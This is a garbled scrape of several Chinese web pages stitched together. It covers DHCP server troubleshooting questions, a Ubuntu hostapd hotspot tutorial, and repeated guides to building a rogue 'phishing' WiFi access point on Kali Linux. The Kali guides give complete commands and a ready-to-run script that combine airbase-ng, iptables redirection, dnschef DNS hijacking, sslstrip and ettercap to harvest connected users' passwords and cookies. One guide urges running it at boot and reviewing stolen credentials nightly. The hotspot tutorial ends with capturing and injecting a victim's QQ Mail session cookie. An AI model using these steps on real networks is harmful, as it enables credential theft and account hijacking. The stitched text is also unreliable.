hcpd -cf /etc/dhcp/dhcpd.conf.sample -pf /var/run/dhcpd.pid at0 显示未找到命令

linux下如何开机自启动dhcp服务_百度知道利用Kali进行WiFi钓鱼测试实战- 福建最大的资讯平台-福州新闻网
                                                                                     
当前位置: >
利用Kali进行WiFi钓鱼测试实战
时间: 03:34  浏览次数:
本站新闻声明:利用Kali进行WiFi钓鱼测试实战内容来源于李贺记者投稿,新闻内容的真实性我们无从得知,不过我们会尽最大的努力去审核利用Kali进行WiFi钓鱼测试实战的内容,也欢迎大家指出本新闻的错误之处,我们会很好的改正的,同事感谢李贺记者为我们提供新闻信息,稿费我们已经发放给新闻提供者了,我们更希望大家能够多多的问我们提供新闻信息。 利用Kali进行WiFi钓鱼测试实战 Kali WiFi钓鱼 应用安全
文中提及的部分技术可能带有一定攻击性,仅供安全学习和教学用途,禁止非法使用。请不要做一只咖啡馆里安静的猥琐大叔。 写在前面 从至少一年前我就一直想在自己跑kali的笔记本上架个钓鱼热点。然而由于网上的教程的nat写得有问题,别人写好的脚本和我电脑有些互不待见,最接近成功的一次只做到了qq能聊天,百度都上不去。 而最近忽然意识到了问题的所在,成功实现了建立wifi热点,dns劫持,js注入,图片嗅探,和BEEF结合对用户浏览器进行攻击测试。 故写此文分享给大家,希望与之前的我有一样困惑的同志们能有所收获。 建立热点 工具:isc-dhcp-Aircrack-ng套件;iptables 建立过程: 首先写dhcp配置文件/etc/dhcp/dhcpd.conf 写入如下内容: default-lease-time 700; max-lease-time 8000; subnet 10.0.0.0 netmask 255.255.255.0 { option routers 10.0.0.1; option subnet-mask 255.255.255.0; option domain-name-servers 10.0.0.1; range 10.0.0.10 10.0.0.100; } 这里以10.0.0.1作为网关和dns服务器地址。 然后我们处理无线网卡 ifconfig wlan1 down #wlan1修改成你的网卡 iwconfig wlan1 mode monitor ifconfig wlan1 up airmon-ng start wlan1 上述命令可以防止出现:Error: Got channel -1, expected a value 0. 然后用airbase建立热点 airbase-ng -e Fishing -c 11 mon0 热点的网络流量会被虚拟到at0这块网卡上面 ifconfig at0 up ifconfig at0 10.0.0.1 netmask 255.255.255.0 route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 打开ip转发 echo 1 /proc/sys/net/ipv4/ip_forward 开启dhcp dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0 service isc-dhcp-server start 然后可以试着用手机连接,应该可以连上但上不了网 于是配置NAT iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE #对eth0进行源nat iptables -A FORWARD -i wlan1 -o eth0 -j ACCEPT #把无线网卡流量转发到有线网卡(或者什么能上网的网卡)上面 iptables -A FORWARD -p tcp --syn -s 10.0.0.0/24 -j TCPMSS --set-mss 1356 #修改最大报文段长度 注意那第三个命令调整MSS,不加后果很严重(我就一直死在这里) (这里可能还是DNS错误,请看后文中的dns代理服务器搭建) 劫持DNS 工具:dnschef 过程: dnschef -i 10.0.0.1 --nameserver 210.73.64.1#53 上述命令是以ip10.0.0.1(上文中的fakeap网关和DNS的ip)建立dns,对于所有请求转发到210.73.64.1进行解析。显然这只是个“代理”并没有劫持的功效 于是我们进化: dnschef --, --fakeip=10.0.0.1 -i 10.0.0.1 --nameserver 210.73.64.1#53 把淘宝和百度解析到本机了。 来源地址:/a/IT/40821.html
上一篇: & 下一篇:没有了
文章编辑: admin
(请您在发表言论时自觉遵守互联网相关政策法律法规,文明上网,健康言论。)
>>相关文章
>>图片新闻温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!&&|&&
LOFTER精选
网易考拉推荐
用微信&&“扫一扫”
将文章分享到朋友圈。
用易信&&“扫一扫”
将文章分享到朋友圈。
&之前写过kali-linux下用 HostAPd+bridge-utils 搭建网桥的方式来创建wifi热点的日志,有兴趣可以在看下不同:这里再介绍一种方法,是使用 airbase-ng + dhcpd 创建虚拟WiFi热点;顺便使用 sslstrip+ettercap 进行中间人攻击,嗅探使用者的上网信息和劫持cookie!所需要的软件如下;kali-linux都已经自带了,其他的系统可以自行安装:&&& #用来发送数据isc-dhcp-server && #简单的dhcp服务器&&&&& #突破ssl加密&&&&& #嗅探劫持leaf /etc/dhcp/dhcpd.conf&& 编辑dhcp服务器配置文件,修改如下:default-lease-time 700;max-lease-time 8000;subnet 10.0.0.0 netmask 255.255.255.0 {option routers 10.0.0.1;option subnet-mask 255.255.255.0;option domain-name "FreeWiFi";option domain-name-servers 10.0.0.1;range 10.0.0.10 10.0.0.100;}然后激活网卡至监听模式:airmon-ng start wlan0airbase-ng -e FreeWiFi -c 6 mon0此时虚拟wifi的信号已经发送出去了,如果出现错误:Error: Got channel -1, expected a value & 0.执行如下命令:airmon-ng stop mon0ifconfig wlan0 downiwconfig wlan0 mode monitorifconfig wlan0 up然后从激活网卡至监听模式那里重新开始。接着执行如下命令:ifconfig at0 upifconfig at0 10.0.0.1 netmask 255.255.255.0ifconfig at0 mtu 1400route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1iptables --flushiptables --table nat --flushiptables --delete-chainiptables --table nat --delete-chainecho 1 & /proc/sys/net/ipv4/ip_forwardiptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1iptables -P FORWARD ACCEPTiptables --append FORWARD --in-interface at0 -j ACCEPTiptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADEiptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0/etc/init.d/isc-dhcp-server start虚拟WiFir热点创建成功,接下来就是嗅探欺骗钓鱼了:sslstrip -fpk 10000ettercap -Tpuqi at0然后就等着鱼儿上钩吧!手机上测试了下,网易邮箱直接明文密码:&百度使用了加密:&写了一个脚本,修改成自己的设置每次执行就ok了:复制下面代码,保存为 “Fake_a_ap.sh”,然后 chmod +x Fake_a_ap.sh && ./Fake_a_ap.sh #!/bin/shecho "即将创建WiFi热点,请确保dhcpd.conf已经配置好!" &sleep 5ifconfig wlan0 down
#wlan0修改成你的网卡iwconfig wlan0 mode monitorifconfig wlan0 upairmon-ng start wlan0 &sleep 5
airbase-ng -e FreeWiFi -c 6 mon0 &
#修改成自己的热点名称和信道sleep 5ifconfig at0 upifconfig at0 10.0.0.1 netmask 255.255.255.0ifconfig at0 mtu 1400route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1iptables --flush && iptables --table nat --flush && iptables --table nat --flush && iptables --table nat --delete-chain &echo 1 & /proc/sys/net/ipv4/ip_forwardiptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1iptables -P FORWARD ACCEPTiptables --append FORWARD --in-interface at0 -j ACCEPTiptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADEiptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0sleep 2/etc/init.d/isc-dhcp-server start &sleep 5sslstrip -fpk 10000 &ettercap -puTqi at0当然还可以更加淫荡!简单:设置成将数据包保存到本地,然后再把这个脚本添加到“启动应用程序”里或者,让它随系统启动,,,然后就没有然后了:每天睡觉前打开数据包检查下里面的username,passwd,cookie,,etc,,,,,,
xiao106347推荐阅读:
阅读(47445)|
用微信&&“扫一扫”
将文章分享到朋友圈。
用易信&&“扫一扫”
将文章分享到朋友圈。
历史上的今天
loftPermalink:'',
id:'fks_',
blogTitle:'Kali-Linux下创建一个钓鱼WiFi热点',
blogAbstract:'&之前写过kali-linux下用 HostAPd+bridge-utils 搭建网桥的方式来创建wifi热点的日志,有兴趣可以在看下不同:'
{list a as x}
{if x.moveFrom=='wap'}
{elseif x.moveFrom=='iphone'}
{elseif x.moveFrom=='android'}
{elseif x.moveFrom=='mobile'}
${a.selfIntro|escape}{if great260}${suplement}{/if}
{list a as x}
推荐过这篇日志的人:
{list a as x}
{if !!b&&b.length>0}
他们还推荐了:
{list b as y}
转载记录:
{list d as x}
{list a as x}
{list a as x}
{list a as x}
{list a as x}
{if x_index>4}{break}{/if}
${fn2(x.publishTime,'yyyy-MM-dd HH:mm:ss')}
{list a as x}
{if !!(blogDetail.preBlogPermalink)}
{if !!(blogDetail.nextBlogPermalink)}
{list a as x}
{if defined('newslist')&&newslist.length>0}
{list newslist as x}
{if x_index>7}{break}{/if}
{list a as x}
{var first_option =}
{list x.voteDetailList as voteToOption}
{if voteToOption==1}
{if first_option==false},{/if}&&“${b[voteToOption_index]}”&&
{if (x.role!="-1") },“我是${c[x.role]}”&&{/if}
&&&&&&&&${fn1(x.voteTime)}
{if x.userName==''}{/if}
网易公司版权所有&&
{list x.l as y}
{if defined('wl')}
{list wl as x}{/list}请教linux中isc-dhcp-server服务启动失败的问题 - 开源中国社区
当前访客身份:游客 [
当前位置:
用树莓派做DHCP服务器,安装了isc-dhcp-server,配置文件也改好了。
每次开机后,服务都启动失败,但是在命令行里启动服务,却能成功,不知道具体原因,用chkconfig看了,服务是开机自启动的。
具体提示如下:
pi@raspberrypi:~ $ service isc-dhcp-server status
● isc-dhcp-server.service - LSB: DHCP server
Loaded: loaded (/etc/init.d/isc-dhcp-server)
Active: failed (Result: exit-code) since Tue
09:55:07 UTC; 4min 7s
Process: 416 ExecStart=/etc/init.d/isc-dhcp-server start (code=exited, status=
1/FAILURE)
pi@raspberrypi:~ $ sudo service isc-dhcp-server start
pi@raspberrypi:~ $ service isc-dhcp-server status
● isc-dhcp-server.service - LSB: DHCP server
Loaded: loaded (/etc/init.d/isc-dhcp-server)
Active: active (running) since Tue
10:00:30 UTC; 2s ago
Process: 1209 ExecStart=/etc/init.d/isc-dhcp-server start (code=exited, status
=0/SUCCESS)
CGroup: /system.slice/isc-dhcp-server.service
└─1218 /usr/sbin/dhcpd -q -cf /etc/dhcp/dhcpd.conf -pf /var/run/dh...
服务起来以后,是可以正常为客户机分配IP地址的,只是每次开机后,自启服务都会失败,需要手动启动才能成功,不知道是什么原因。
共有0个答案
更多开发者职位上
有什么技术问题吗?
hdparro...的其它问题
类似的话题使用hostapd和dhcpd来在Ubuntu上开启无线热点
作者:eechen
字体:[ ] 来源:OSChina 时间:10-13 10:56:50
这篇文章主要介绍了使用hostapd和dhcpd来在Ubuntu上开启无线热点,注意一下硬件上需要无线网卡的支持,需要的朋友可以参考下
Hostapd简介:
简单说,hostapd能够使得无线网卡切换为master模式,模拟AP(通常可以认为是路由器)功能,也就是我们说的软AP(Soft AP)。
Hostapd的功能就是作为AP的认证服务器,负责控制管理stations(通常可以认为带无线网卡的PC)的接入和认证。
通过Hostapd可以将无线网卡切换为AP/Master模式,通过修改配置文件,可以建立一个开放式的(不加密)的,WEP,WPA或WPA2的无线网络。并且通过修改配置文件可以设置无线网卡的各种参数,包括频率,信号,beacon包时间间隔,是否发送beacon包,如果响应探针请求等等。还可以设置mac地址过滤条件等。具体可以参考它的配置文件说明。
下面就从官网上摘下的部分原因及翻译。翻译的不好请见谅。
hostapd is an IEEE 802.11 AP and IEEE 802.1X/WPA/WPA2/EAP/RADIUS Authenticator.
Hostapd是IEEE 802.11 AP and IEEE 802.1X/WPA/WPA2/EAP/RADIUS的认证器
hostapd is a user space daemon for access point and authentication servers. It implements IEEE 802.11 access point management, IEEE 802.1X/WPA/WPA2/EAP Authenticators, RADIUS client, EAP server, and RADIUS authentication server. The current version supports Linux (Host AP, madwifi, mac80211-based drivers) and FreeBSD (net80211).
Hostapd是一个访问点以及认证服务器的运行于用户空间的守护程序。它实现了IEEE 802.11接入带你(Access Point)的管理功能,是IEEE 802.1X/WPA/WPA2/EAP的认证器,是 RADIUS client, EAP server, and RADIUS认证服务器。当前版本的hostapd支持linux上Host AP,madwifi和基于mac80211协议栈的驱动程序,以及FreeBSD上net80211协议栈的驱动程序。
hostapd is designed to be a &daemon& program that runs in the background and acts as the backend component controlling authentication. hostapd supports separate frontend programs and an example text-based frontend, hostapd_cli, is included with hostapd.
Hostapd是一个后台守护进程,作为后台组件来控制和管理认证功能。Hostapd支持多个前台程序。hostapd_cli,就是一个跟hostapd一起的命令行前台程序。
下面我们来看一下利用hostapd和dhcpd在Ubuntu系统上建立无线热点的方法:执行 iwlist 如果 Supported interface modes 的下有 AP 的话表示该网卡支持AP模式,可以创建无线热点。 比如我的无线网卡是Qualcomm Atheros AR9485 Wireless Network Adapter,Linux内核自带了驱动ath9k,支持创建AP无线热点。 1. 安装hostapd和dhcpd代码如下:sudo apt-get install hostapd isc-dhcp-server开机不需要启动这两个服务,建议把它们关掉:代码如下:sudo update-rc.d -f hostapd remove注释掉下面两个文件start on那一行:代码如下:sudo nano /etc/init/isc-dhcp-server.confsudo nano /etc/init/isc-dhcp-server6.conf
2. 配置hostapd和dhcpd代码如下:sudo nano /etc/hostapd/hostapd.conf& 注意自己设置其中的无线热点名称ssid和认证密码wpa_passphrase.代码如下:interface=wlan0driver=nl80211ssid=YOUR_AP_NAMEhw_mode=gchannel=10macaddr_acl=0auth_algs=3wpa=2wpa_passphrase=YOUR_AP_PASSWORDwpa_key_mgmt=WPA-PSKwpa_pairwise=TKIP CCMPrsn_pairwise=TKIP CCMP代码如下:sudo nano /etc/dhcp/dhcpd.conf 在末尾加入以下内容:代码如下:subnet 192.168.0.0 netmask 255.255.255.0{range 192.168.0.2 192.168.0.10;option routers 192.168.0.1;option domain-name-servers 192.168.0.1,180.76.76.76,8.8.8.8;}其中180.76.76.76是百度公共DNS服务器,8.8.8.8则是Google的DNS服务器.
在自己的家目录下创建一个hostapd目录,里面新建启动和关闭脚本,比如我这样写(注意把里面eechen换成你的用户名):代码如下:nano
/home/eechen/hostapd/ap-start.sh&/p&
&p&#!/bin/bash# 开启内核IP转发bash -c "echo 1 & /proc/sys/net/ipv4/ip_forward"# 开启防火墙NAT转发(如果本机使用eth0上网,则把ppp0改为eth0)iptables -t nat -A POSTROUTING -o ppp0 -j MASQUERADE# 关闭NetworkManager对无线网卡的控制nmcli nm wifi off# 设置并启动无线网卡ifconfig wlan0 192.168.0.1 netmask 255.255.255.0# 解锁无线设备,可以用rfkill list查看解锁结果.rfkill unblock wlan# 睡眠6秒,待rfkill解锁生效sleep 6s# 启动dhcpd和hostapd,如果hostapd无法启动请查看日志hostapd.log,查看这两个进程ps -ef|egrep "dhcpd|hostapd"nohup hostapd /etc/hostapd/hostapd.conf &/home/eechen/hostapd/hostapd.log 2&&1 &dhcpd wlan0 -pf /var/run/dhcpd.pidps -ef|head -n1 && ps -ef|egrep "dhcpd|hostapd"nano
/home/eechen/hostapd/ap-stop.sh&/p&
&p&#!/bin/bashkillall hostapd dhcpdbash -c "echo 0 & /proc/sys/net/ipv4/ip_forward"ifconfig wlan0 down3. 启动hostapd和dhcpd
在桌面新建两个启动器(快捷方式),里面分别填入: 代码如下:gksu /home/eechen/hostapd/ap-start.sh gksu /home/eechen/hostapd/ap-stop.sh 因为脚本需要root用户身份执行,所以需要用gksu运行。
注意:如果你开启了ufw防火墙,ufw默认是禁止转发的,这会导致防火墙NAT转发失效,这时应该设置允许转发: 代码如下:sudo nano /etc/default/ufw 将 DEFAULT_FORWARD_POLICY 设为 ACCEPT 然后重启ufw即可: 代码如下:sudo service ufw restart之后运行启动器即可启动和关闭AP无线热点。
4. 用wireshark监控经过wlan0的通信
安装wireshark(其中 eechen改为你的用户名): 代码如下:sudo apt-get install wiresharksudo chgrp eechen /usr/bin/dumpcapsudo chmod 750 /usr/bin/dumpcapsudo setcap cap_net_raw,cap_net_admin+eip /usr/bin/dumpcapAlt+F2运行wireshark,选择网络接口wlan0,Filter里输入http.cookie contains 然后手机端登录网页QQ邮箱,在WireShark即可查看和获取QQ邮箱登录的Cookie,如图所示:右键点击Cookie项把Value复制出来,然后用Firefox访问站点https://w./,Alt+C激活 Original Cookie Injector( GreaseMonkey),弹出输入框Wireshark Cookie Dump,把Cookie项的Value粘贴到里面,然后点OK确定并刷新页面即可登录QQ邮箱。或者你使用Tamper Data这个Firefox扩展在提交时修改Cookie值也是可以的。
查看连接wlan0网络的客户端: 代码如下:sudo arp 返回IP地址和MAC硬件地址和无线接口名. 代码如下:iw dev wlan0 station dump 能显示收发包和字节数等.
查看网络接口速度: 代码如下:sar -n DEV 1
大家感兴趣的内容
12345678910
最近更新的内容

我要回帖

更多关于 etc dhcp dhcpd.conf 的文章

 

随机推荐